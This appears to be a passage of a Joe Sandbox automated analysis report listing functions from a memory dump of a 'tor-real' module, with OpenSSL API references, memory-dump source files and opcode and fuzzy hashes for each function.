                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Cipher$Update$X_ctrl$Final_exInit_exX_iv_lengthmemcpymemmove
                                                                            • String ID: D$P$o
                                                                            • API String ID: 2980357715-72909346
                                                                            • Opcode ID: 915eef0f2bee7e0dfdaadc4cd7762f5f90ac795d267c8d459d2aa8c9a4261d89
                                                                            • Instruction ID: d9999cba72bc7f3f9f0370c44faa6cab2034dc0f83339b6af31f01788e686390
                                                                            • Opcode Fuzzy Hash: 915eef0f2bee7e0dfdaadc4cd7762f5f90ac795d267c8d459d2aa8c9a4261d89
                                                                            • Instruction Fuzzy Hash: 4BF101B05093429FD300DF29C58475ABBF0BF89748F149D6DE8A88BB41E375E984DB92
                                                                            Function 6C0A47E1 Relevance: 24.2, APIs: 16, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_strndup$memcpy$N1_item_free$X509_freetime
                                                                            • String ID:
                                                                            • API String ID: 2542812563-0
                                                                            • Opcode ID: ac0cccfdf9c1ae3ee9f5b7cf8e62b9f5852692ddf7b4bb194b8660af44ecc99e
                                                                            • Instruction ID: 0a8ee3f9595e58e02d937bd2d1337bcb212044d4aa56a932e23d3d13a9e863cd
                                                                            • Opcode Fuzzy Hash: ac0cccfdf9c1ae3ee9f5b7cf8e62b9f5852692ddf7b4bb194b8660af44ecc99e
                                                                            • Instruction Fuzzy Hash: AAC1A2B86057019FDB00CFA5C08079ABBE0BF89308F14896EE8999F765D730E846DF51
                                                                            Function 6C0C0949 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0856
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0866
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0C0872
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0C087A
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0C095F
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0997
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0C09BF
                                                                            • EVP_PKEY_new_raw_private_key.LIBCRYPTO-1_1 ref: 6C0C09EF
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0C0A48
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0A70
                                                                            • EVP_DigestSignFinal.LIBCRYPTO-1_1 ref: 6C0C0A94
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C0C0ADA
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0C0BA2
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0C66
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0C0D4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Update$L_cleanseSign$FinalFinal_exInitInit_exO_ctrlO_memcmpR_put_errorX_freeY_freeY_new_raw_private_key__stack_chk_fail
                                                                            • String ID: /
                                                                            • API String ID: 1782661204-2043925204
                                                                            • Opcode ID: a7afdad8ffbdab9cf9d370ef34fdedf5fec806f5da8bb43ab2b73ba2fe24757f
                                                                            • Instruction ID: 24083eb76ff07189d854d0a36e74e30aba43a4ce55e957cb50855bdc0c87ff9b
                                                                            • Opcode Fuzzy Hash: a7afdad8ffbdab9cf9d370ef34fdedf5fec806f5da8bb43ab2b73ba2fe24757f
                                                                            • Instruction Fuzzy Hash: D45167B46093819FD350DF69C08475EFBF1AF89748F51892EE9888B710D779E8488B82
                                                                            Function 6C0CEB59 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            • d2i_X509.LIBCRYPTO-1_1 ref: 6C0CEBBE
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CECF1
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0CED0B
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0CED4C
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0CED71
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0CED7B
                                                                            • EVP_PKEY_missing_parameters.LIBCRYPTO-1_1 ref: 6C0CED8D
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEDF4
                                                                            • X509_up_ref.LIBCRYPTO-1_1 ref: 6C0CEDFC
                                                                              • Part of subcall function 6C0BF8E0: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0BF97A
                                                                              • Part of subcall function 6C0BF8E0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0BFB97
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CF0AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X509_free$L_sk_pop_freeL_sk_pushL_sk_valueO_zallocR_clear_errorX509X509_get0_pubkeyX509_up_refY_missing_parametersd2i_
                                                                            • String ID: @
                                                                            • API String ID: 2205809501-2766056989
                                                                            • Opcode ID: 2125339384031d05cc8c7bdff05b70d92e6315e05ac9503ae35796d78ae775a7
                                                                            • Instruction ID: ab1183416ad6cf62a09ed2db4fe260a4fc847a83df0707d2b37f60245f7fa3cc
                                                                            • Opcode Fuzzy Hash: 2125339384031d05cc8c7bdff05b70d92e6315e05ac9503ae35796d78ae775a7
                                                                            • Instruction Fuzzy Hash: 769115B46097018FD714DF29C58079EBBF5BF89748F25892DE8988B710E734E945CB82
                                                                            Function 6C0D0E10 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0D0E5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_free
                                                                            • String ID: P${
                                                                            • API String ID: 1282063954-1612326427
                                                                            • Opcode ID: 4721c1e60f281edae042e6608ca3aa0c2de0e5a3326e4a52fce70bab335c8d9d
                                                                            • Instruction ID: d6522abd165813b311a2c48b50e0546a1fa34c0701a3602a19adeaa5c6fdf4d6
                                                                            • Opcode Fuzzy Hash: 4721c1e60f281edae042e6608ca3aa0c2de0e5a3326e4a52fce70bab335c8d9d
                                                                            • Instruction Fuzzy Hash: 52B142B06097418FE310CF29C58476EBBF1BF89348F56892DE4989BB50DB75E449CB82
                                                                            Function 6C0C46BB Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 245COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2$A
                                                                            • API String ID: 0-681408588
                                                                            • Opcode ID: 159a66f2a484f9e72e39ddf259461559822a879618bb1e483b397772a9eb55fd
                                                                            • Instruction ID: 8b12d6c20028964f8444150939a3c3ae4e64e1f36e27e629cf0f7af503ba5e6b
                                                                            • Opcode Fuzzy Hash: 159a66f2a484f9e72e39ddf259461559822a879618bb1e483b397772a9eb55fd
                                                                            • Instruction Fuzzy Hash: 2FB110B0609702AFD3109F65D48836EBBE4FB85348F118A2DE4989B750D7B9E548CF83
                                                                            Function 6C0CC55B Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0CC57F
                                                                            • EVP_PKEY_get0_RSA.LIBCRYPTO-1_1 ref: 6C0CC589
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0CC5AD
                                                                            • RAND_bytes.LIBCRYPTO-1_1 ref: 6C0CC5DB
                                                                            • EVP_PKEY_CTX_new.LIBCRYPTO-1_1 ref: 6C0CC614
                                                                            • EVP_PKEY_encrypt_init.LIBCRYPTO-1_1 ref: 6C0CC626
                                                                            • EVP_PKEY_encrypt.LIBCRYPTO-1_1 ref: 6C0CC652
                                                                            • EVP_PKEY_encrypt.LIBCRYPTO-1_1 ref: 6C0CC69E
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0CC6AE
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_encrypt$D_bytesO_mallocO_zallocX509_get0_pubkeyX_freeX_newY_encrypt_initY_get0_
                                                                            • String ID: .$0
                                                                            • API String ID: 911164579-446915570
                                                                            • Opcode ID: 5f628c0daf0fcda1c207f93e5ec489629597143562735811c9ad10e7c816c854
                                                                            • Instruction ID: 0142edc1a13ffa49ece74beb8e590a4459537867b41ba9240c6ffc84490cfe92
                                                                            • Opcode Fuzzy Hash: 5f628c0daf0fcda1c207f93e5ec489629597143562735811c9ad10e7c816c854
                                                                            • Instruction Fuzzy Hash: DC41E6B060A7419FD740EF69C58436EBBE4AF48788F51982DE8D8CB740E778D549CB42
                                                                            Function 6C0BC860 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 319COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P$h
                                                                            • API String ID: 0-561839982
                                                                            • Opcode ID: 29fcb1816667785bb3edede728a9ea4fe649e33c5be5ae6d18de817cd624c67e
                                                                            • Instruction ID: 14ce5543c4849efd65342cefc2979a9db0b7cb9481b5e11c601b1a2bf3ec880a
                                                                            • Opcode Fuzzy Hash: 29fcb1816667785bb3edede728a9ea4fe649e33c5be5ae6d18de817cd624c67e
                                                                            • Instruction Fuzzy Hash: E6E16D70609701CFD740EF29C58479ABBE0BF88758F148A6DE899AB740D776E944CF82
                                                                            Function 6C0A8C80 Relevance: 16.7, APIs: 11, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8CD7
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1(?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8D04
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1(?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8D15
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000001,?,?,6C09FD5E), ref: 6C0A8E12
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_onceL_sk_findL_sk_valueR_flags
                                                                            • String ID:
                                                                            • API String ID: 1582411886-0
                                                                            • Opcode ID: 5f24721565e6eb2c433446c972ec2a7b4a2eea849360b2517e7f809df0e2ea75
                                                                            • Instruction ID: 676a055f25d1645f9d08735ab150e6a102decf509d266816a0d0e5008a2f1c13
                                                                            • Opcode Fuzzy Hash: 5f24721565e6eb2c433446c972ec2a7b4a2eea849360b2517e7f809df0e2ea75
                                                                            • Instruction Fuzzy Hash: C5914171609392CFDB10CFD5C48075AB7F1AB89348F204A1EE8648BB56E734D846CB92
                                                                            Function 6C0A0EE0 Relevance: 16.6, APIs: 11, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0A02C0: CRYPTO_clear_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0A02EE
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0A0F0F
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0A0F2A
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0F55
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A0F6E
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0F8F
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A0FBA
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0FDB
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A0FFC
                                                                              • Part of subcall function 6C0A03E0: BIO_free.LIBCRYPTO-1_1 ref: 6C0A03F4
                                                                              • Part of subcall function 6C0A03E0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0A040F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A1025
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0A1046
                                                                              • Part of subcall function 6C0E9680: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96B6
                                                                              • Part of subcall function 6C0E9680: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96D4
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96E2
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96F0
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E96FE
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E970C
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E971A
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E9728
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E9736
                                                                              • Part of subcall function 6C0E9680: BN_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C092336), ref: 6C0E9744
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A1071
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$N_free$O_clear_free$Y_free$L_sk_pop_freeX_free
                                                                            • String ID:
                                                                            • API String ID: 666369201-0
                                                                            • Opcode ID: f46bdf0fb409902ac6f4542bef46c15573cee994f4dbf8b08574441d8fa852ed
                                                                            • Instruction ID: 1cbfb7bb0d51d97e72e476d65b467a3df144765172bfe9165cc34682529f5079
                                                                            • Opcode Fuzzy Hash: f46bdf0fb409902ac6f4542bef46c15573cee994f4dbf8b08574441d8fa852ed
                                                                            • Instruction Fuzzy Hash: A54199B4149740DFD740DFA4D0C9B6EBBE0AF48308F1189ADE8A88F726C774E4488B41
                                                                            Function 6C096DB8 Relevance: 16.3, APIs: 7, Strings: 2, Instructions: 514COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /$D
                                                                            • API String ID: 0-1275706592
                                                                            • Opcode ID: 5ff474e2181476a39bddf35ab86604860f5f990018a31e2cf77abbe51716476b
                                                                            • Instruction ID: 82b7da75facebb025874e85fa0bbf3fd63d2e8f8606deb75b1363b5998b0970a
                                                                            • Opcode Fuzzy Hash: 5ff474e2181476a39bddf35ab86604860f5f990018a31e2cf77abbe51716476b
                                                                            • Instruction Fuzzy Hash: 983247B160A301CFE750CF29C18479ABBE0BF84308F14996DEC988B756D775E884DB92
